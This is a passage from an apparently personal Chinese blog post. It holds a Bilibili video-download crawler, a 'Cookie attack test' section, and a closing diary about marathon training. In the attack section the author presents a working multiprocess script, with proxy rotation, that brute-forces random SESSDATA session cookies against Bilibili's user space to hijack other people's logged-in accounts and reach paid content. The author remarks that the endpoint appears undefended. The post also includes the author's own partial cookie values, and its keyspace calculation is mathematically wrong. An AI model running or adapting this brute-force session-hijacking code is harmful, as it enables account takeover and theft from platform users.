        df.to_csv(episode_path, index=False, header=True, sep='\t')
    return df

if __name__ == '__main__':

    N = 10000
    args = load_args(GameConfig)

    # dfs = []
    # args.random_strategy = True
    # for i in range(N):
    #     print(i)
    #     df = run(args, None)
    #     df['episode'] = i
    #     dfs.append(df)
    # pd.concat(dfs).to_csv('episode/random.csv', sep='\t', header=True, index=False)
    #

    args.random_strategy = False
    N = 2000
    for i in range(1732, N):
        print(i)
        df = run(args, 'episode/ai_%04d.csv' % (i))
        # df.loc[:, 'episode'] = i
        # dfs.append(df)
    # pd.concat(dfs).to_csv('episode/random.csv', sep='\t', header=True, index=False)

笔者认为就 D Q N \rm DQN DQN而言,难点在于如何对于复杂游戏编码状态和行动,或许还是理解的过于肤浅了,有时间一定要好好看明白GitHub@Deep-Reinforcement-Learning-Algorithms-with-PyTorch


第二部分 B \rm B B站视频爬取与 C o o k i e \rm Cookie Cookie攻击测试

(一) B \rm B B站视频下载脚本

这个脚本或许会有人会感兴趣:

# -*- coding: utf-8 -*-
# @author: caoyang
# @email: caoyang@163.sufe.edu.cn

import os
import re
import json
import requests
from tqdm import tqdm

class BiliBiliCrawler(object):
	
	def __init__(self) -> None:				
		self.user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0'
		self.video_webpage_link = 'https://www.bilibili.com/video/{}'.format
		self.video_detail_api = 'https://api.bilibili.com/x/player/pagelist?bvid={}&jsonp=jsonp'.format						
		self.video_playurl_api = 'https://api.bilibili.com/x/player/playurl?cid={}&bvid={}&qn=64&type=&otype=json'.format	
		self.episode_playurl_api = 'https://api.bilibili.com/pgc/player/web/playurl?ep_id={}&jsonp=jsonp'.format			
		self.episode_webpage_link = 'https://www.bilibili.com/bangumi/play/ep{}'.format
		self.anime_webpage_link = 'https://www.bilibili.com/bangumi/play/ss{}'.format
		self.chunk_size = 1024
		self.regexs = {
			'host': 'https://(.*\.com)',
			'episode_name': r'meta name="keywords" content="(.*?)"',
			'initial_state': r'<script>window.__INITIAL_STATE__=(.*?);',
			'playinfo': r'<script>window.*?__playinfo__=(.*?)</script>',	
		}

	def easy_download_video(self, bvid, save_path=None) -> bool:
		"""Tricky method with available api"""
		
		# Request for detail information of video
		response = requests.get(self.video_detail_api(bvid), headers={'User-Agent': self.user_agent})
		json_response = response.json()
		
		cid = json_response['data'][0]['cid']
		video_title = json_response['data'][0]['part']
		if save_path is None:
			save_path = f'{video_title}.mp4'		

		print(f'Video title: {video_title}')
		
		# Request for playurl and size of video
		response = requests.get(self.video_playurl_api(cid, bvid), headers={'User-Agent': self.user_agent})
		json_response = response.json()
		video_playurl = json_response['data']['durl'][0]['url']
		# video_playurl = json_response['data']['durl'][0]['backup_url'][0]
		video_size = json_response['data']['durl'][0]['size']
		total = video_size // self.chunk_size

		print(f'Video size: {video_size}')
		
		# Download video
		headers = {
			'User-Agent': self.user_agent,
			'Origin'	: 'https://www.bilibili.com',
			'Referer'	: 'https://www.bilibili.com',			
		}
		headers['Host'] = re.findall(self.regexs['host'], video_playurl, re.I)[0]
		headers['Range'] = f'bytes=0-{video_size}'
		response = requests.get(video_playurl, headers=headers, stream=True, verify=False)
		tqdm_bar = tqdm(response.iter_content(self.chunk_size), desc='Download process', total=total)
		with open(save_path, 'wb') as f:
			for byte in tqdm_bar:
				f.write(byte)
		return True

	def easy_download_episode(self, epid, save_path=None) -> bool:
		"""Tricky method with available api"""
		
		# Request for playurl and size of episode
		response = requests.get(self.episode_playurl_api(epid))
		json_response = response.json()
		# episode_playurl = json_response['result']['durl'][0]['url']
		episode_playurl = json_response['result']['durl'][0]['backup_url'][0]
		episode_size = json_response['result']['durl'][0]['size']
		total = episode_size // self.chunk_size

		print(f'Episode size: {episode_size}')
		
		# Download episode
		headers = {
			'User-Agent': self.user_agent,
			'Origin'	: 'https://www.bilibili.com',
			'Referer'	: 'https://www.bilibili.com',			
		}
		headers['Host'] = re.findall(self.regexs['host'], episode_playurl, re.I)[0]
		headers['Range'] = f'bytes=0-{episode_size}'
		response = requests.get(episode_playurl, headers=headers, stream=True, verify=False)
		tqdm_bar = tqdm(response.iter_content(self.chunk_size), desc='Download process', total=total)
		if save_path is None:
			save_path = f'ep{epid}.mp4'
		with open(save_path, 'wb') as f:
			for byte in tqdm_bar:
				f.write(byte)
		return True

	def download(self, bvid, video_save_path=None, audio_save_path=None) -> dict:
		"""General method by parsing page source"""
		
		if video_save_path is None:
			video_save_path = f'{bvid}.m4s'
		if audio_save_path is None:
			audio_save_path = f'{bvid}.mp3'
		
		common_headers = {
			'Accept'			: '*/*',
			'Accept-encoding'	: 'gzip, deflate, br',
			'Accept-language'	: 'zh-CN,zh;q=0.9,en;q=0.8',
			'Cache-Control'		: 'no-cache',
			'Origin'			: 'https://www.bilibili.com',
			'Pragma'			: 'no-cache',
			'Host'				: 'www.bilibili.com',
			'User-Agent'		: self.user_agent,
		}

		# In fact we only need bvid
		# Each episode of an anime also has a bvid and a corresponding bvid-URL which is redirected to another episode link
		# e.g. https://www.bilibili.com/video/BV1rK4y1b7TZ is redirected to https://www.bilibili.com/bangumi/play/ep322903
		response = requests.get(self.video_webpage_link(bvid), headers=common_headers)
		html = response.text
		playinfos = re.findall(self.regexs['playinfo'], html, re.S)
		if not playinfos:
			raise Exception(f'No playinfo found in bvid {bvid}\nPerhaps VIP required')
		playinfo = json.loads(playinfos[0])
		
		# There exists four different URLs with observations as below
		# `baseUrl` is the same as `base_url` with string value
		# `backupUrl` is the same as `backup_url` with array value
		# Here hard code is employed to select playurl
		def _select_video_playurl(_videoinfo):
			if 'backupUrl' in _videoinfo:
				return _videoinfo['backupUrl'][-1]
			if 'backup_url' in _videoinfo:
				return _videoinfo['backup_url'][-1]
			if 'baseUrl' in _videoinfo:
				return _videoinfo['baseUrl']
			if 'base_url' in _videoinfo:
				return _videoinfo['base_url']	
			raise Exception(f'No video URL found\n{_videoinfo}')	
			
		def _select_audio_playurl(_audioinfo):
			if 'backupUrl' in _audioinfo:
				return _audioinfo['backupUrl'][-1]
			if 'backup_url' in _audioinfo:
				return _audioinfo['backup_url'][-1]
			if 'baseUrl' in _audioinfo:
				return _audioinfo['baseUrl']
			if 'base_url' in _audioinfo:
				return _audioinfo['base_url']
			raise Exception(f'No audio URL found\n{_audioinfo}')
		
		# with open(f'playinfo-{bvid}.js', 'w') as f:
			# json.dump(playinfo, f)

		if 'durl' in playinfo['data']:
			video_playurl = playinfo['data']['durl'][0]['url']
			# video_playurl = playinfo['data']['durl'][0]['backup_url'][1]
			print(video_playurl)
			video_size = playinfo['data']['durl'][0]['size']
			total = video_size // self.chunk_size
			print(f'Video size: {video_size}')
			headers = {
				'User-Agent': self.user_agent,
				'Origin'	: 'https://www.bilibili.com',
				'Referer'	: 'https://www.bilibili.com',			
			}
			headers['Host'] = re.findall(self.regexs['host'], video_playurl, re.I)[0]
			headers['Range'] = f'bytes=0-{video_size}'
			# headers['Range'] = f'bytes={video_size + 1}-{video_size + video_size + 1}'
			response = requests.get(video_playurl, headers=headers, stream=True, verify=False)
			tqdm_bar = tqdm(response.iter_content(self.chunk_size), desc='Download process', total=total)
			with open(video_save_path, 'wb') as f:
				for byte in tqdm_bar:
					f.write(byte)
			return True

		elif 'dash' in playinfo['data']:
			videoinfo = playinfo['data']['dash']['video'][0]
			audioinfo = playinfo['data']['dash']['audio'][0]
			video_playurl = _select_video_playurl(videoinfo)
			audio_playurl = _select_audio_playurl(audioinfo)

		else:
			raise Exception(f'No data found in playinfo\n{playinfo}')

		# First make a fake request to get the `Content-Range` params in response headers
		fake_headers = {
			'Accept'			: '*/*',
			'Accept-Encoding'	: 'identity',
			'Accept-Language'	: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
			'Accept-Encoding'	: 'gzip, deflate, br',
			'Cache-Control'		: 'no-cache',
			'Origin'			: 'https://www.bilibili.com',
			'Pragma'			: 'no-cache',
			'Range'				: 'bytes=0-299',
			'Referer'			: self.video_webpage_link(bvid),
			'User-Agent'		: self.user_agent,
			'Connection'		: 'keep-alive',
		}
		response = requests.get(video_playurl, headers=fake_headers, stream=True)
		video_size = int(response.headers['Content-Range'].split('/')[-1])
		total = video_size // self.chunk_size
		
		# Next make a real request to download full video
		real_headers = {
			'Accept'			: '*/*',
			'accept-encoding'	: 'identity',
			'Accept-Language'	: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
			'Accept-Encoding'	: 'gzip, deflate, br',
			'cache-control'		: 'no-cache',
			'Origin'			: 'https://www.bilibili.com',
			'pragma'			: 'no-cache',
			'Range'				: f'bytes=0-{video_size}',
			'Referer'			: self.video_webpage_link(bvid),
			'User-Agent'		: self.user_agent,
			'Connection'		: 'keep-alive',
		}
		response = requests.get(video_playurl, headers=real_headers, stream=True)
		tqdm_bar = tqdm(response.iter_content(self.chunk_size), desc='Download video', total=total)
		with open(video_save_path, 'wb') as f:
			for byte in tqdm_bar:
				f.write(byte)
				
		# The same way for downloading audio
		response = requests.get(audio_playurl, headers=fake_headers, stream=True)
		audio_size = int(response.headers['Content-Range'].split('/')[-1])
		total = audio_size // self.chunk_size // 2
		
		# Confusingly downloading full audio at one time is forbidden
		# We have to download audio in two parts
		with open(audio_save_path, 'wb') as f:
			audio_part = 0
			for (_from, _to) in [[0, audio_size // 2], [audio_size // 2 + 1, audio_size]]:
				headers = {
					'Accept': '*/*',
					'Accept-Encoding': 'identity',
					'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
					'Accept-Encoding': 'gzip, deflate, br',
					'Cache-Control': 'no-cache',
					'Origin': 'https://www.bilibili.com',
					'Pragma': 'no-cache',
					'Range': f'bytes={_from}-{_to}',
					'Referer': self.video_webpage_link(bvid),
					'User-Agent': self.user_agent,
					'Connection': 'keep-alive',
				}
				audio_part += 1
				response = requests.get(audio_playurl, headers=headers, stream=True)
				tqdm_bar = tqdm(response.iter_content(self.chunk_size), desc=f'Download audio part{audio_part}', total=total)
				for byte in tqdm_bar:
					f.write(byte)
		return True

	def easy_download(self, url) -> bool:
		"""
		Download with page URL as below:
		>>> url = 'https://www.bilibili.com/video/BV1jf4y1h73r'
		>>> url = 'https://www.bilibili.com/bangumi/play/ep399420'
		"""

		headers = {
			'Accept': '*/*',
			'Accept-Encoding': 'gzip, deflate, br',
			'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
			'Cache-Control': 'no-cache',
			'Origin': 'https://www.bilibili.com',
			'Pragma': 'no-cache',
			'Host': 'www.bilibili.com',
			'User-Agent': self.user_agent,
		}		
		response = requests.get(url, headers=headers)
		html = response.text
		initial_states = re.findall(self.regexs['initial_state'], html, re.S)
		if not initial_states:
			raise Exception('No initial states found in page source')
		initial_state = json.loads(initial_states[0])
		
		# Download anime with several episodes
		episode_list = initial_state.get('epList')
		if episode_list is not None:
			name = re.findall(self.regexs['episode_name'], html, re.S)[0].strip()
			for episode in episode_list:
				if episode['badge'] != '会员':							 # No VIP required
					if not os.path.exists(name):
						os.mkdir(name)
					self.download(
						bvid=str(episode['bvid']),
						video_save_path=os.path.join(name, episode['titleFormat'] + episode['longTitle'] + '.m4s'),
						audio_save_path=os.path.join(name, episode['titleFormat'] + episode['longTitle'] + '.mp3'),
					)
				else:													 # Unable to download VIP anime
					continue
		
		# Download common videos
		else:
			video_data = initial_state['videoData']
			name = video_data['tname'].strip()
			if not os.path.exists(name):
				os.mkdir(name)
			self.download(
				bvid=str(episode['bvid']),
				video_save_path=os.path.join(name, video_data['title'] + '.m4s'),
				audio_save_path=os.path.join(name, video_data['title'] + '.mp3'),
			)
		return True

if __name__ == '__main__':
	
	bb = BiliBiliCrawler()
	
	# bb.easy_download_video('BV14T4y1u7ST', 'temp/BV14T4y1u7ST.mp4')
	# bb.easy_download_video('BV1z5411W7tX', 'temp/BV1z5411W7tX.mp4')
	
	# bb.easy_download_episode('199933', 'temp/ep199933.mp4')
	# bb.easy_download_episode('321808', 'temp/ep321808.mp4')
	
	# bb.download('BV1PT4y137CA')
	# bb.download('BV14T4y1u7ST')
	
	# bb.easy_download('https://www.bilibili.com/video/BV1jf4y1h73r')
	# bb.easy_download('https://www.bilibili.com/bangumi/play/ep399420')
	# bb.easy_download('https://www.bilibili.com/bangumi/play/ss12548/')

另外在该脚本所在目录新建 4 4 4个空文件夹: t e m p , l o g g i n g , v i d e o , a u d i o \rm temp,logging,video,audio temp,logging,video,audio

上述代码最后被注释的几行即对BiliBiliCrawler函数里的几个不同爬取方法的测试,关于爬取的详细思路笔者不想再赘述,爬虫其实就是这么一回事,熟能生巧,主要记录几个关键点:

  1. easy_download_video函数:直接可以通过视频的 B V \rm BV BV号来下载,下载结果是音频视频合成好的 . m p 4 \rm .mp4 .mp4文件,这个方法无需分析页面源代码,所有的信息都来自于请求 B \rm B B站提供的接口,其中最重要的就是self.video_playurl_api这个接口,它提供视频源链接与视频大小,这个其实是需要一些运气才能抓到的包,建议去浏览器的控制台里监听 X H R \rm XHR XHR,这样不容易漏。然后下载视频的本质只需要在请求头里添加Range参数,值为视频的字节大小即可。

  2. easy_download_episode函数:用于下载番剧,思路基本跟easy_download_video雷同,接收的参数是番剧的 e p \rm ep ep,可能有人不知道 e p \rm ep ep号怎么看,比如https://www.bilibili.com/bangumi/play/ep250984就是《风灵玉秀》, e p \rm ep ep号就是 250984 250984 250984强推《风灵玉秀》真香,国漫终于开始搞百合了,至少看得很舒心),这个方法的弱点是只能下载一集,如果想要全篇下载建议用最后一个方法,下载得到的也是音频视频合成好的 . m p 4 \rm .mp4 .mp4文件。

  3. download函数:这个就是很有趣的事情了, B B B站上目前所有视频其实都是有 B V \rm BV BV号的,即便是番剧也是如此。比如访问www.bilibili.com/video/BV1PT4y137CA就会自动重定向到《名侦探柯南》,因此可以直接给出一个只用 B V \rm BV BV号就能下载一切的方法,不过这个方法的逻辑跟上面两个有所差异,这里用到的是分析页面源代码:

    • 任意寻找一个带 B V \rm BV BV号链接的视频,查看页面源代码从里面搜索playinfo就会看到如下的信息(视频链接https://www.bilibili.com/video/BV1nx411F7Jf,神作 A M D \rm AMD AMD强推):
      Figure 2
    • 然后就可以从这一段源码中找到所有你想要的东西,视频源就在backupUrlbackup_urlbaseUrlbase_url中,其实四个里面的链接都可以用来下载,建议拿第一个backupUrl,感觉相对稳定一些。
  4. easy_download本质就是基于download函数的扩展,只需要给任意一个视频的网址链接即可下载,注意这里如果你给到一个番剧的链接,是可以直接把整个所有剧集都下载下来的,因此推荐使用该方法,缺点在于下载得到的视频仍然是和音频分开的。

    此外的细节就是音频是不能一次性下载的,必须要分两段下载。

(二) B \rm B B C o o k i e Cookie Cookie攻击测试

有人可能要问了,那么大会员怎么办,这也是笔者非常感兴趣的问题,经过一系列的钻研,最终发现关键问题在于 C o o k i e \rm Cookie Cookie中的SESSDATA字段。

这是怎么被发现的呢?笔者想经常玩 B \rm B B站的朋友一定不陌生下面这样的用户评论:

B \rm B B站最帅的人👉https://space.bilibili.com/

然后点击进去就会发现是自己的账号,这个链接里显然没有和你身份信息相关的任何字段,那么将你引到自己账号的就大概率是 C o o k i e \rm Cookie Cookie。简单监听就会发现这样的 C o o k i e \rm Cookie Cookie内容:
在这里插入图片描述笔者思来想去还是把自己的 C o o k i e \rm Cookie Cookie给打上马赛克,显然如果带上这段Cookie,应该是可以访问到个人主页的,否则只会跳转到登录(如果没有登录,访问https://space.bilibili.com/,就会自动跳转到登录页面)。

# -*- coding: utf-8 -*-
# @author: caoyang
# @email: caoyang@163.sufe.edu.cn

import requests
from bs4 import BeautifulSoup

def _cookie_to_string(_cookies):
	string = ''
	for key, value in _cookies.items():
		string += '{}={}; '.format(key, value)
	return string.strip()

cookies = {
	"_uuid": "734643A3-58D0-49AD-7C14-D354884C516738397infoc",
	"bili_jct": "d57a576f60b82220175d3ffc571edbef",
	"buvid_fp": "A0FE0996-3A5D-4E2A-A4B0-AE327ACD7B9A148826infoc",
	"buvid_fp_plain": "9ECE9F3E-FE9A-4827-A49D-C1AB0E94F854167644infoc",
	"buvid3": "F2EB0177-2BDF-4BA9-9A87-6A399AC553E4167627infoc",
	"DedeUserID": "130321232",
	"DedeUserID__ckMd5": "42d02c72aa29553d",
	"fingerprint": "9307d54681dc236c513a4b0f96bf8388",
	"innersign": "0",
	"PVID": "1",
	"SESSDATA": "",
	"sid": "7nffa1lf"
}

headers = {
	'Connection': 'keep-alive',
	'Cookie': _cookie_to_string(cookies),
	'Host': 'space.bilibili.com',
	'TE': 'trailers',
	'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0'
}

r = requests.get('https://space.bilibili.com', headers=headers)
html = r.text
soup = BeautifulSoup(html, 'lxml')
print(soup.find('title').string)

运行上面的代码应该可以看到输出就是笔者的账号名称。

什么你没有看到?那就对了,因为笔者偷偷删掉了SESSDATA的值,进一步地,笔者可以明确的你,只要留下SESSDATA,其他 11 11 11全部删掉,依然可以输出笔者的账号名称。你可以用自己的账号去试一试。

那么有SESSDATA就足够了,没有SESSDATA就完全不行,这就意味着SESSDATA就是验证内容的全部,笔者按照SESSDATA值的格式随机生成一个类似的差不多是这个样子的:

dcb500d8,1644888158,520eb*81

这个SESSDATA中间的这个1644888158显然是一个时间戳,进一步抓包就会发现它是SESSDATA的失效时间,即 C o o k i e \rm Cookie Cookie的失效时间,差不多是 180 180 180天,而笔者试下来最后三位几乎都是*81,因此随机的部分只在剩下的 13 13 13位的十六进制字节中,仅仅只有 1 3 16 ≈ 6.654 × 1 0 17 ≈ 2 59 13^{16}\approx6.654×10^{17}\approx 2^{59} 13166.654×1017259,因此理论上只要我敲定一个时间戳,然后穷举所有的可能性,只要在这个时间戳上有人登录过,那么就能够通过访问https://space.bilibili.com访问到他的主页,如果他是大会员,那么只需要将SESSDATA添加到 C o o k i e \rm Cookie Cookie中去就可以下载那些付费的内容了。

于是思路就是随机生成一个如同dcb500d8,1644888158,520eb*81格式的SESSDATA去访问SESSDATA,简单的攻击脚本如下所示:

  • p r o x y . p y \rm proxy.py proxy.py
# -*- coding: utf-8 -*-
# @author: caoyang
# @email: caoyang@163.sufe.edu.cn

import os
import sys
import time
import random
import requests
from bs4 import BeautifulSoup
from multiprocessing import Process, Pool, Queue

from pprint import pprint

def cookie_to_string(cookies: dict) -> str:
	string = ''
	for key, value in cookies.items():
		string += '{}={}; '.format(key, value)
	return string.strip()


def random_sessdata():
	chars = ['a', 'b', 'c', 'd', 'e', 'f', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']
	nums = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']
	return f'{"".join([random.choice(chars) for _ in range(8)])},1644888158,{"".join([random.choice(chars) for _ in range(5)])}*81'


def easy_requests(url: str, headers: dict, proxies: dict) -> str:
	try:
		if proxies is None:
			response = requests.get(url, headers=headers, timeout=30)
		else:
			response = requests.get(url, headers=headers, proxies=proxies, timeout=30)
		html = response.text
		soup = BeautifulSoup(html, 'lxml')
		try: 
			title = str(soup.find('title').string).encode('ISO-8859-1').decode('utf8')
		except:
			title = str(soup.find('title').string)
		return title, 0, time.strftime('%Y-%m-%d %H:%M:%S')
	except Exception as e: 
		return e, 1, time.strftime('%Y-%m-%d %H:%M:%S')

def _attack(url: str, queue: Queue, pid: str) -> None:
	if queue is None:
		while True:
			cookies = {
				'SESSDATA': random_sessdata(),
			}
			headers = {
				'Connection': 'keep-alive',
				'Cookie': cookie_to_string(cookies),
				'Host': 'space.bilibili.com',
				'TE': 'trailers',
				'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24',
			}	
			response, flag, timestamp = easy_requests(url, headers, proxies=None)
			with open(f'logging/{pid}.txt', 'a', encoding='utf8') as f:
				f.write(f'{timestamp}\t{cookies["SESSDATA"]}\t{headers["User-Agent"]}\tNone\t{response}\n')	
	else:
		proxy = queue.get()
		while True:
			proxies = {'https': 'https://{}'.format(proxy)}
			cookies = {
				'SESSDATA': random_sessdata(),
			}
			headers = {
				'Connection': 'keep-alive',
				'Cookie': cookie_to_string(cookies),
				'Host': 'space.bilibili.com',
				'TE': 'trailers',
				'User-Agent': generate_user_agent('../user_agent_list.txt'),
			}
			response, flag, timestamp = easy_requests(url, headers, proxies)
			if flag: 
				proxy = queue.get()
			with open(f'logging/{pid}.txt', 'a', encoding='utf8') as f:
				f.write(f'{timestamp}\t{cookies["SESSDATA"]}\t{headers["User-Agent"]}\t{proxy}\t{response}\n')

def attack(target_url = 'https://space.bilibili.com') -> None:
	processes = []
	params = {
		'url': target_url,
		'queue': None,
		'pid': str(1).zfill(3),
	}
	with open(f'logging/{params["pid"]}.txt', 'w', encoding='utf8') as f:
		pass	
	processes.append(Process(target=_attack, kwargs=params))

	for process in processes:
		process.start()
	for process in processes:
		process.join()

	time.sleep(1000)
	for process in processes:
		process.terminate()

if __name__ == '__main__':
	attack()

可惜 2 59 2^{59} 259相对于个人电脑来说还是过于庞大了,开了十几天仍然没有能够碰撞到可行的SESSDATA,甚至连自己的SESSDATA都没有撞出来过。好消息是发现这个接口基本上是不会封 I P \rm IP IP的,因为笔者每隔一段时间会试试自己的SESSDATA还能不能有效访问,发现总是有效,因此 B \rm B B对这个接口似乎是完全不设防,那总会有有心人能够把 2 59 2^{59} 259给全部试完,总不能一个时间戳上只有笔者一个人登录过吧,那也太孤独了。


后记

这个暑期最高兴的事情就是老妈骑车陪笔者跑了一次路跑之后对笔者跑步这件事的态度有了很大的转变,以前她都是对我无话可说,觉得我跑得又黑又瘦,跟个猴子一样,可能这次她真的是被我给触动到了。

目前笔者报名了两场半马,一场是11月21日在浙江舟山举办的马拉松,这场无需抽签,刚好是今早10点起报,成功抢到;另一场是前几天报的喜临门绍兴马拉松,这场需要抽签,笔者主要觉得中签率太低,而且自己第一次跑,肯定更难中签,所以干脆抢了舟山拉倒,万一绍兴的中了,那就再说,状态好大不了两场都跑,实在不行就当花钱买个教训。

10号那天坐车到镇江南,终于是回到了学校里,看到翻新的操场,宿舍都没回拉着行李箱就先去操场跑了一圈,实在是畅快,然后晚上测4km,用时17分30秒,勉强达到四五月份的水平,但是耐力已经无可奈何的掉了,整整两个月没有跑过10km以上的距离,如今连10km都坚持不来。不过笔者倒是不太慌,因为上学期来差不多也是这样,半个月之后基本就完全恢复到巅峰了,所以也不是很急。今晚顶着台风出去跑了3km,那种踩水塘的快感又回来了,鞋子衣服头发全部湿透,痛快绝顶。

很高兴的是开学前终于出了上学期的成绩,六门专业课四门4.0,两门3.7,想四五月份的风波导致完全无心学习,感觉都没希望了,起初还想跟刘天浩争一争成绩,后来越来越佛系,还好结局不差。而且开学来在百度学术上搜到自己也的一作paper,终于不是零产出的废人了。

走到目前并无不满,毕竟五年征程刚刚过去一年而已,留给笔者操作的空间无穷无尽。虽然得知W已经另寻新欢后还是夜有所梦。可能彻底忘记过去的人和事并不那么容易,所以必须找到其他专注点,至少目前笔者最大的渴求就是完赛半马,这可能是我这辈子到现在最执着的一件事情。

最后,舟山马拉松见,我的朋友。

永远奔跑,无论是否年轻。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值